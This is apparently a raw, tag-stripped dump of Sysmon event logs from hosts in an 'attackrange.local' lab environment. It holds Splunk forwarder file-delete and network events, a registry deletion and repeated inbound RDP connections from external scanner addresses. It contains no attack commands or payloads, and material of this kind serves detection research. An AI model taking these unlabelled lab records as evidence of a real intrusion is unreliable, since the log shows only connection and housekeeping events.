23542300x800000000000000051032Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:25.358{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD3D07C61BB30D7633E30BED618232EC,SHA256=C31FFECC710CAD615065E2AD4557ADE59DF8B71987B82D1995279E59926CA485,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:26.125{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662BD5EC746B8753FE00F22E4B636D30,SHA256=FFA6EC0A934E5D12BDE50BE3B19E7A9F2C71FE02659937751F5C387983FB2CCD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051035Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:23.432{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52562-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000051034Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:26.360{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B299910D8896C170DE52429CEB8D00,SHA256=BF24795588FB9B90A739F1B3E1037CCCC7C831CA33A60161091EB8A0CBB45709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:27.136{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41155DA2D6372EFDC1AD139CE31B42D2,SHA256=928B7E1B689540674CDFC57850BC13591D3333E71D6B8235BEC0DE7007F70D82,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:24.995{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-12160-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051039Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:25.777{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52563-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000051038Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:24.498{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60536-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051037Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:27.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB4A7E793972005BEF97B5682AC3869C,SHA256=856996F91A14B23860F0EA5226320CAB0F792546BA514483298BD45336F17D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051036Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:27.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ECAB9D29A64E2E7BCB128DC57E71B4C,SHA256=EAF33F6C0194A82515062B6A72A87B34CA5FF4FF423C3EFEA8ECE6548B5FB15B,IMPHASH=00000000000000000000000000000000falsetrue 12241200x800000000000000082359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-DeleteValue2021-04-20 15:00:28.495{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BITS\Performance\PerfMMFileName 23542300x800000000000000082358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:28.261{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F814F73C57DF01F0AD41FC3264D9B9C0,SHA256=14ABEE2C152D63F8B392AE5FC38D95C1CF6987B661627D781D8470A4DAB7A570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:28.151{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34617C09E53F8FE12D1EECB83772D208,SHA256=E2EA92DB59F75981E2F243DE2394D50BFC887CCA649E5465B937E572D74F6F0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:26.811{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com65223-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:26.600{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-13517-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:26.459{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-16230-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051041Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:26.050{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61999-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051040Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:28.391{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA9B8D9CCD7DA680A829188BA25057F,SHA256=1D841F2869D3BD54D81443E81E373719BAF72BC9AD0BB7E5732F429B45BB6AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.776{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72036FAD426ADD45B1513ED61D9938C3,SHA256=6309D1C9D6C753933977CF54997E3689E31FB6FC8BA853B9F605D0155079D8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.511{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3A15C090154B3EEC3F7FCCF8289150F0,SHA256=F2A107F50D0CA8D646870DEC649EBE4CA17620E429891E92AFF4A7134F5D74C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.511{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=099AA66755E3EFC7ED12B8D2D756543D,SHA256=0FACF2F5C750CAB0C859B857FF22C0EE2BE59BBF16940110F349DA12B92B3B22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.167{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0F53C7D374252E69F21D0765C809AB,SHA256=0CFF685B5EBA7AE21BDF3F15C975AF9599957DC950BCC579219BC30A38193708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051043Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:29.407{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF6441FFAB64A20FEBEECA7A1F4476B,SHA256=72126451CEDF9C39AA5A57D08EB261276B315D3DE4425213A775227E5E39A751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051042Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:29.125{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA303239CF226158CC3FE5D668CB2959,SHA256=0C72B778476EDA8EC439B4EB2C5F87AB2F365D171616200F7E38A9DE9E142003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:30.229{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D6898AC78BE00C5872D9665BED211BB,SHA256=3D827A8FDFD115B0DDACC91987BA74367EEBB0CB1C85390160F39D4D2CEE937E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051044Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:30.422{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9BA3F2EDCC49EFC1B485E400F50AA24,SHA256=00E499DE06AA4DF8DAB5C3DE4D905C33B95DD16A1E803B66A9E033EFF39926C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:28.789{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com61413-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:28.003{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14874-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:31.276{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88790949AF760C125D5C2C196D4C6DE,SHA256=06F41017D634FE80FF8B67B54315E36413ED963EBB3F63BB9A21203385676675,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.546{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-10803-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.406{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18944-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:29.247{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57670-false10.0.1.12-8000- 23542300x800000000000000082367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:31.120{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1BCB3FA302DAFAD98E4F07B6BA833B7,SHA256=6979A0854FB08C2A5B074035473209759F7E969AFCDC6DF25606C955965CE4CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051048Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:31.797{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C9F17DE7CD32663CEF47E0576F530857,SHA256=0873013D4F6E610ABF333A3CB02B57C13CF0EB5A115220C4753397CB1305B56D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051047Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:29.180{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64932-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051046Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:28.064{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60111-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051045Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:31.438{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97400054EB5A16B4395D3AA9E6AD8F46,SHA256=C5B6B4DBFC7901B49AF566F3E318C5B8B20E080103816A948E24819EE25F1E39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:32.417{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99055EEA8277BD5EC4B4B6A72E2896B4,SHA256=4326A770E6582BDB623790110CD4F1C8E4F8A45C7C6F01BF923191EE9C9CEEF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:30.937{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-17588-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:32.198{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F77DA138B236086CAAC018295265BB8,SHA256=07A0E7111B794DE3B8917CB68471F6F941252CBFCE4A9421C4F40CA0D4168C35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051049Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:32.454{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08D6350C6906865A5DBDD075759CEB56,SHA256=7164F0B3AF7451730DD7899AABE4BF100E8B4FA36CC720CD18FD2D9E33292761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:33.432{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E42697E9F0220A4C5A9647CB8018D37A,SHA256=26FFA2F40145911A0565BACD3DCB874FB2299A7004CCF5B98C49A2DB2E386DA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:31.095{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56144-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051054Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:31.777{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52564-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000051053Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:30.662{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63463-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051052Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:30.585{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57608-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051051Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:33.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21C24B3C8397F8E46FD462E2D3C69A5B,SHA256=9FC982CACF08881365E442C262F803D2776C981176F541A5A2AB956F7303D0C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051050Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:33.282{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51722529FE8C8488B319CF0B07BA287C,SHA256=7BDBDB9797C345B8A859F076535595F3BA86F1292AFA93F607734F896238DD8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:34.776{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=443F577CDF554C4F5AB21CE0B86EEA40,SHA256=D26C506D92B4C82EFB48DCD3884F0FC1010E826D5A2EACF6ECB4E3098A1405F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:34.495{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA2C9E91E6B1DD7134C8F6D117765CE,SHA256=618CBCA58C72C068CB31DF2897E685DCA2E0DC78BE8BF4BA59185A4CBA152565,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:32.370{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-21656-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051057Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:32.000{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59074-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051056Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:34.594{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC4DB37F80103962096699ECBE35BECD,SHA256=A192E2A6EDB91D88AFC0E92E660F9489B9E2E92F87724586EBC4218B4A4C0436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051055Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:34.485{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C1F28BDE2C32B84BA8B6BB7A1CA4FD1,SHA256=84FC2B62F6B0EEB7868B7DCD34A5503DB54F77E5F2D1103D86607A1BDBF05B0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:35.526{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=748B777F9B04AA5A04F0F400E2DF4D44,SHA256=EF7734EAAAFEE1C5CAD7CB41BFB94F89F0A6966AAFB39937DD5A058FB0669907,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:33.934{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-20300-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051059Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:32.325{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51484-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051058Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:35.485{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF4884A5B6332570B12748E9E09CB025,SHA256=DB1DEE42AE93CCD8E49E793559F311D833B859B2DB02B56B29BB91FB328BDD98,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:35.321{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24368-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:35.278{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57671-false10.0.1.12-8000- 354300x800000000000000082384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:34.726{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59214-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:36.589{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 